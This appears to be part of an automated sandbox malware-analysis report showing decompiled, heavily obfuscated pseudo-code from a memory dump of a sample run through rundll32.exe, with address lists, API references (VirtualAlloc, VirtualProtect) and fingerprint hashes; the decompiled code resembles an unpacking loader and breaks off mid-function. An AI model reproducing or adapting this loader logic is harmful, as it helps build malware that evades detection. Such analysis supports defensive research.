				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
				_t81 = _t67;
				_t68 = _t65;
				if(_t67 != 0) {
					 *(_t99 - 8) = 0;
					 *_t101 =  *_t101 ^ _t81;
					_t49 = E03462A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
				}
				_t75 = _t72;
				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
				_t102 = _t101 + 0xc;
				_t82 = _t81 + _t68;
				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
					_push(0);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t82 = _t82; // executed
					_t52 = E03465F16(_t51, _t60, 0, _t75, _t89); // executed
					_push(_t52);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t54 = _t52;
					_t51 = E03468F3B(_t54, _t60, 0, _t75, _t82, _t89);
				}
				 *(_t99 - 4) = _t82;
				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
				 *_t41 =  *(_t60 + 0x41d140);
				_t78 =  *(_t99 - 8);
				_push(_t89);
				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
				asm("popad");
				return _t51;
			}

0x0346709d
0x0346709d
0x0346709d
0x0346709d
0x0346709e
0x034670a5
0x034670ab
0x034670ae
0x034670af
0x034670b2
0x034670b6
0x034670ba
0x034670c1
0x034670cb
0x034670d0
0x034670d0
0x034670d6
0x034670dd
0x034670e0
0x034670e3
0x034670e9
0x034670f5
0x034670fc
0x03467102
0x0346710a
0x0346710c
0x03467112
0x03467119
0x0346711d
0x0346712b
0x0346712b
0x03467135
0x03467138
0x03467138
0x0346713e
0x03467146
0x0346714a
0x0346714b
0x03467153
0x03467157
0x03467158
0x0346715d
0x03467163
0x03467166
0x03467169
0x0346716c
0x03467179
0x0346717d
0x0346717f
0x03467181
0x03467182
0x03467184
0x0346718e
0x03467191
0x03467191
0x0346719d
0x0346719e
0x0346719e
0x0346719e
0x034671a6
0x034671a8
0x034671b0
0x034671b4
0x034671b5
0x034671ba
0x034671c2
0x034671c6
0x034671c7
0x034671c7
0x034671cc
0x034671e0
0x034671ea
0x034671f0
0x034671f1
0x034671f7
0x034671fb
0x034671ff
0x03467201

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 034670D0
VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 03467138

Memory Dump Source

Source File: 00000004.00000002.387226313.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction ID: 9c6cbca5fe906d55b5ad8c5c61ed5180ca3a73c16057110ff340bbef3c0213ab
Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction Fuzzy Hash: 18415E72904304EFEB04DF55C885BAEBBF5EF88310F09849EEC88AF245C77419509B6A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6920 Parent PID: 6864 rundll32.exeCOMMON

Executed Functions

Function 03305F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E03305F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edi;
				signed int _t610;
				void* _t612;
				signed int _t613;
				intOrPtr _t619;
				void* _t626;
				void* _t628;
				void* _t630;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				void* _t640;
				intOrPtr _t641;
				signed int _t644;
				void* _t646;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				intOrPtr _t656;
				signed int _t658;
				signed int _t661;
				signed int _t665;
				void* _t667;
				signed int _t668;
				signed int _t671;
				signed int _t675;
				signed int _t677;
				void* _t679;
				signed int _t680;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				void* _t691;
				signed int _t692;
				signed int _t698;
				signed int _t701;
				signed int _t706;
				void* _t708;
				intOrPtr _t709;
				signed int _t711;
				void* _t713;
				signed int _t714;
				signed int _t717;
				intOrPtr _t720;
				signed int _t722;
				void* _t724;
				signed int _t726;
				intOrPtr _t729;
				void* _t730;
				signed int _t733;
				void* _t739;
				void* _t741;
				void* _t742;
				signed int _t744;
				void* _t746;
				signed int _t747;
				signed int _t753;
				signed int _t756;
				signed int _t760;
				void* _t762;
				signed int _t767;
				signed int _t771;
				void* _t773;
				void* _t775;
				void* _t776;
				intOrPtr _t778;
				signed int _t781;
				signed int _t785;
				intOrPtr _t788;
				signed int _t791;
				intOrPtr _t794;
				signed int _t797;
				signed int _t813;
				signed int _t816;
				void* _t819;
				signed int _t821;
				signed int _t824;
				void* _t827;
				void* _t828;
				void* _t830;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t844;
				signed int _t851;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed int _t875;
				signed int _t882;
				void* _t888;
				signed int _t889;
				signed int _t893;
				signed int _t896;
				signed int _t901;
				signed int _t906;
				signed int _t908;
				signed int _t916;
				signed int _t920;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t936;
				signed int _t939;
				signed int _t945;
				signed int _t947;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t958;
				void* _t966;
				signed int _t969;
				signed int _t975;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t987;
				signed int _t1002;
				signed int _t1005;
				signed int _t1009;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1028;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1036;
				long _t1041;
				void* _t1043;
				signed int _t1045;
				signed int _t1052;
				signed int _t1054;
				signed int _t1057;
				signed int _t1060;
				signed int _t1063;
				signed int _t1065;
				signed int _t1068;
				void* _t1069;
				signed int _t1071;
				signed int _t1074;
				void* _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1085;
				void* _t1089;
				signed int _t1091;
				void* _t1097;
				void* _t1102;
				signed int _t1103;
				signed int _t1106;
				void* _t1109;
				signed int _t1112;
				signed int _t1119;
				signed int* _t1120;
				signed int* _t1121;
				signed int* _t1122;
				signed int* _t1123;
				signed int* _t1124;
				signed int* _t1125;
				signed int* _t1126;
				signed int* _t1127;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1130;
				signed int* _t1131;
				signed int* _t1132;
				signed int* _t1133;
				signed int* _t1134;
				signed int* _t1136;
				signed int* _t1139;
				signed int* _t1140;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1143;
				signed int* _t1144;

				_t1063 = __esi;
				_t813 = __ebx;
				_push(__eax);
				 *_t1119 =  *_t1119 & 0x00000000;
				 *_t1119 =  *_t1119 + _t1102;
				_t1103 = _t1119;
				_t1120 = _t1119 + 0xfffffff0;
				_push(_t1103);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 + __ecx;
				_push(__ecx);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 ^ __edx;
				_push(_t1103);
				 *_t1120 =  *_t1120 ^ _t1103;
				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
				_push( *((intOrPtr*)(__ebx + 0x41f068))());
				_pop( *_t7);
				_push(_v16);
				_pop( *_t9);
				_pop( *_t10);
				_t920 = _v16;
				_t1121 = _t1120 - 0xfffffffc;
				_push(__esi);
				 *_t1121 =  *_t1121 ^ __esi;
				 *_t1121 =  *_t1120;
				_push(_v16);
				 *_t1121 = _t920;
				_push(_t1002);
				 *_t1121 =  *_t1121 - _t1002;
				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_v16);
				 *_t1121 = _t610;
				_push(__esi);
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t18);
				_push(_t920);
				 *_t20 = _t612;
				_v20 = _v20 + _v20;
				_push(_v20);
				_pop(_t613);
				_v20 = _t613;
				_t836 = 0 ^  *(__ebx + 0x41c55d);
				if(_t836 > _v20) {
					_push(_v12);
					 *_t1121 = __ebx + 0x41c01b;
					_push(_t1103);
					 *_t1121 =  *_t1121 ^ _t1103;
					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
					_push( *((intOrPtr*)(__ebx + 0x41f064))());
					_pop( *_t31);
					_push(_v20);
					_pop( *_t33);
				}
				_pop( *_t34);
				_t924 = _v20;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t924;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
				_v12 = _t836;
				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
				 *_t1121 = _t813 + 0x41c565;
				_v12 = 0;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
				_pop( *_t48);
				_push(_v20);
				_pop( *_t50);
				_pop( *_t51);
				 *_t1121 =  *_t1121 - _t1103;
				 *_t1121 =  *_t1121 ^ _v20;
				 *_t1121 =  *_t1121 ^ _t813;
				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
				_pop( *_t55);
				_push(_v16);
				_pop( *_t57);
				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t626;
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
				 *_t1121 =  *_t1121 ^ _t924;
				 *_t1121 =  *_t1121 + _t628;
				_v12 = _v12 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
				_pop( *_t72);
				_t840 = _v20;
				 *_t74 = _t630;
				_v20 = _v20 + _t840;
				_push(_v20);
				_pop(_t631);
				_t1065 = _t1063;
				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
				_t1106 = _t1103;
				if(_t842 > _t631) {
					 *_t1121 =  *_t1121 & 0x00000000;
					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
					 *_t1121 = _t813 + 0x41cfe9;
					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
					_push(_t924);
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
				}
				_t633 = _t631 & 0x00000000 ^  *_t1121;
				_t1122 =  &(_t1121[1]);
				 *_t1122 = _t1002;
				 *(_t813 + 0x41d240) = _t633;
				_t1005 = 0;
				_pop( *_t88);
				_t926 = 0 ^ _v20;
				_pop( *_t90);
				_t844 = _t842 & 0x00000000 ^ _v16;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t926;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 | _t844;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
				_v12 = _v12 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
				_t1123 =  &(_t1122[1]);
				_v16 = _v16 & 0x00000000;
				 *_t1123 =  *_t1123 ^  *_t1122;
				_v16 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
				 *_t1123 =  *_t1123 - _t1106;
				 *_t1123 =  *_t1123 | _t638;
				_v12 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
				_t851 =  *_t1123;
				_t1124 =  &(_t1123[1]);
				 *_t113 = _t640;
				_v16 = _v16 + _t851;
				_push(_v16);
				_pop(_t641);
				_t928 = _t926;
				_v16 = _t1005;
				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
					_v20 = _v20 & 0x00000000;
					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
					_v12 = 0;
					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
				}
				 *_t1124 = _t928;
				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
				_t931 = 0;
				_v12 = _t1065;
				_t1068 = _v12;
				_v12 = 0;
				 *_t1124 =  *_t1124 | 0 ^ _a4;
				_v16 = 0;
				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
				_v12 = 0;
				 *_t1124 =  *_t1124 ^ _t644;
				 *_t1124 = _t813 + 0x41cb65;
				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
				_t1125 =  &(_t1124[1]);
				_v12 = _t931;
				_push( *_t1124 + _t646);
				_t934 = _v12;
				_pop(_t647);
				_v12 = _t647;
				_t856 = 0 ^  *(_t813 + 0x41c187);
				_t650 = _v12;
				if(_t856 > _t650) {
					_v20 = 0;
					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
					 *_t1125 =  *_t1125 ^ _t856;
					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
					_v16 = _t1068;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
					_t1068 = _v16;
				}
				_t652 = _t650 & 0x00000000 ^  *_t1125;
				_t1126 = _t1125 - 0xfffffffc;
				 *_t162 = _t652;
				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
				_push(_v16);
				_pop(_t653);
				_t936 = _t934;
				 *_t1126 = _t653;
				 *_t1126 =  *_t1126 & 0x00000000;
				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
				 *_t1126 = _t813 + 0x41ce8a;
				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
				 *_t1126 = _t1106;
				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
				_t1109 = 0;
				_t658 =  *_t1126;
				_t1127 =  &(_t1126[1]);
				 *_t1127 = _t658;
				 *_t1127 =  *_t1127 - _t856;
				 *_t1127 =  *_t1127 ^ _t658;
				 *_t1127 =  *_t1127 - _t936;
				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
				_v12 = _v12 & 0x00000000;
				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
				 *_t1127 = _t936;
				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
				_t939 = 0;
				_t1128 = _t1127 - 0xfffffffc;
				_v20 = _t813;
				_t1009 =  *_t1127;
				_t816 = _v20;
				_v12 = 0;
				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
				 *_t1128 =  *_t1128 ^ _t1009;
				 *_t1128 = _t665;
				 *_t1128 =  *_t1128 - _t1009;
				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
				_t1129 =  &(_t1128[1]);
				 *_t1129 =  *_t1129 ^ _t1068;
				_t1069 = _t667;
				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
				_t1071 = 0;
				_v20 = _t1009;
				_t859 = 0 ^  *(_t816 + 0x41c250);
				_t1012 = _v20;
				if(_t859 > _t668) {
					 *_t1129 =  *_t1129 - _t1012;
					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
					_v12 = 0;
					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
				}
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
				_t862 = _t859;
				 *_t1129 =  *_t1129 - _t1071;
				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
				 *_t1129 = _t816 + 0x41ca88;
				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
				_v20 = _t862;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
				_t865 = _v20;
				_pop( *_t211);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
				_t819 = _t816;
				 *_t1129 =  *_t1129 & 0x00000000;
				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
				_t1112 = _t1109;
				 *_t1129 =  *_t1129 - _t865;
				 *_t1129 =  *_t1129 ^ _t1012;
				 *_t1129 = _t819 + 0x41ca0d;
				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
				 *_t1129 = _t677;
				 *_t1129 = _t819 + 0x41cbe6;
				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
				_t867 =  *_t1129;
				_t1130 = _t1129 - 0xfffffffc;
				 *_t230 = _t679;
				_v16 = _v16 + _t867;
				_push(_v16);
				_pop(_t680);
				_t821 = _t819;
				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
				_t1074 = _t1071;
				if(_t869 > _t680) {
					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
					_v12 = 0;
					 *_t1130 =  *_t1130 | _t235;
					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
					 *_t1130 =  *_t1130 & 0x00000000;
					 *_t1130 =  *_t1130 + _t238;
					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
				}
				 *_t1130 = _t1012;
				 *(_t821 + 0x41c918) = 0 ^ _t680;
				_t1015 = 0;
				_v16 = _t869;
				_v16 = 0;
				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
				_t247 = _t821 + 0x41d093; // 0x41d093
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 | _t247;
				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t1130 = _t1015;
				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
				_t1018 = 0;
				 *_t250 = _t821;
				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
				_t1077 = _t1074;
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 ^ _v16;
				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
				_v20 = 0;
				 *_t1130 =  *_t1130 | _t253;
				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
				_v20 = _t1020;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
				_t1023 = _v20;
				_t1131 =  &(_t1130[1]);
				 *_t1131 = _t684;
				_t1078 = _a4;
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 |  *_t1130;
				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 | _t268;
				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t689;
				_t273 = _t821 + 0x41c931; // 0x41c931
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t273;
				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t275 = _t1023;
				_v20 = _t821;
				_push(0 + _v16 + _t691);
				_t824 = _v20;
				_pop(_t692);
				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
				_pop( *_t280);
				_push(_v12);
				_pop(_t875);
				if(_t875 > _t692) {
					 *_t1131 = _t824 + 0x41ca9e;
					 *_t1131 =  *_t1131 & 0x00000000;
					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
					 *_t286 = _t692;
					_push(_v16);
					_pop( *_t288);
				}
				_pop( *_t289);
				_t945 = _v12;
				_v12 = _t692;
				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
				 *_t1131 =  *_t1131 ^ _t824;
				 *_t1131 =  *_t1131 + _t945;
				_v12 = 0;
				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
				 *_t1131 = _t824 + 0x41c856;
				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
				_v20 = _t1078;
				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
				_t1081 = _v20;
				_pop( *_t304);
				_t947 = 0 ^ _v20;
				_t879 = 0 ^  *_t1131;
				_t1132 = _t1131 - 0xfffffffc;
				if(_t1023 != _t1081) {
					 *_t1132 =  *_t1132 - _t1023;
					 *_t1132 =  *_t1132 ^ _t879;
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 + _t947;
					_v16 = 0;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t739;
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
					_t1139 = _t1132 - 0xfffffffc;
					 *_t317 = _t741;
					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v20);
					_pop(_t742);
					_t1045 = _t1023;
					_push(0);
					 *_t1139 = _t1045;
					_t906 = 0 ^  *(_t824 + 0x41c244);
					if(_t906 > _t742) {
						 *_t1139 =  *_t1139 ^ _t906;
						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
						 *_t1139 =  *_t1139 & 0x00000000;
						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
						_push(0);
						 *_t1139 = _t947;
						 *(_t824 + 0x41cf47) = 0 ^ _t797;
					}
					_pop( *_t326);
					_t969 = _v12;
					_t908 =  *_t1139;
					_t1140 = _t1139 - 0xfffffffc;
					do {
						asm("movsb");
						_v12 = 0;
						 *_t1140 =  *_t1140 + _t908;
						_v12 = _v12 & 0x00000000;
						 *_t1140 =  *_t1140 + _t969;
						 *_t1140 =  *_t1140 - _t969;
						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
						 *_t1140 =  *_t1140 ^ _t1112;
						 *_t1140 =  *_t1140 ^ _t744;
						 *_t1140 =  *_t1140 & 0x00000000;
						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
						_t1141 =  &(_t1140[1]);
						 *_t337 = _t746;
						_v20 = _v20 +  *_t1140;
						_push(_v20);
						_pop(_t747);
						_t1081 = _t1081;
						_v12 = _t747;
						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
							 *_t1141 = _t824 + 0x41c831;
							 *_t1141 = _t824 + 0x41c7fa;
							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
							_v16 = _t969;
							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
						}
						_pop( *_t352);
						_t969 = 0 + _v12;
						_t1140 = _t1141 - 0xfffffffc;
						_t908 =  *_t1141 - 1;
					} while (_t908 != 0);
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t969;
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
					_v20 = 0;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
					_t975 =  *_t1140;
					_t1142 = _t1140 - 0xfffffffc;
					_v12 = _t753;
					_t756 = _v12;
					 *_t1142 =  *_t1142 ^ _t756;
					 *_t1142 =  *_t1142 ^ _t975;
					_v20 = _v20 & 0x00000000;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
					_pop( *_t371);
					_push(_v16);
					_pop( *_t373);
					_pop( *_t374);
					_t977 = _t975 & 0x00000000 ^ _v16;
					 *(_t824 + 0x41c60a) = 0x40;
					 *_t1142 = _t977;
					_v16 = 0;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
					 *_t1142 = _t760;
					 *_t1142 = _t824 + 0x41c438;
					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
					_pop( *_t386);
					 *_t1142 =  *_t1142 | _t824;
					_t830 = _t762;
					_t824 = 0;
					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
					_t916 =  *(_t824 + 0x41d118);
					_t1052 = _v16;
					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
						 *_t1142 =  *_t1142 - _t916;
						 *_t1142 =  *_t1142 + _t391;
						_t392 = _t824 + 0x41c438; // 0x41c438
						 *_t1142 =  *_t1142 ^ _t977;
						 *_t1142 =  *_t1142 | _t392;
						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
						_v20 = _t977;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
					}
					_t979 =  *_t1142;
					_t1143 = _t1142 - 0xfffffffc;
					_t401 = _t824 + 0x41c60a; // 0x41c60a
					 *_t1143 =  *_t1143 - _t979;
					 *_t1143 =  *_t1143 ^ _t401;
					 *_t1143 = _t979;
					_t403 = _t824 + 0x41cb46; // 0x41cb46
					 *_t1143 =  *_t1143 & 0x00000000;
					 *_t1143 =  *_t1143 + _t403;
					_t404 = _t824 + 0x41c91c; // 0x41c91c
					 *_t1143 = _t404;
					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
					 *_t1143 = _t1081;
					 *(_t824 + 0x41cf40) = 0 ^ _t767;
					_t1097 = 0;
					_t981 =  *_t1143;
					_t1144 =  &(_t1143[1]);
					_pop( *_t408);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + (0 ^ _v20);
					 *_t1144 = _t981;
					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
					 *_t1144 = _t411;
					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
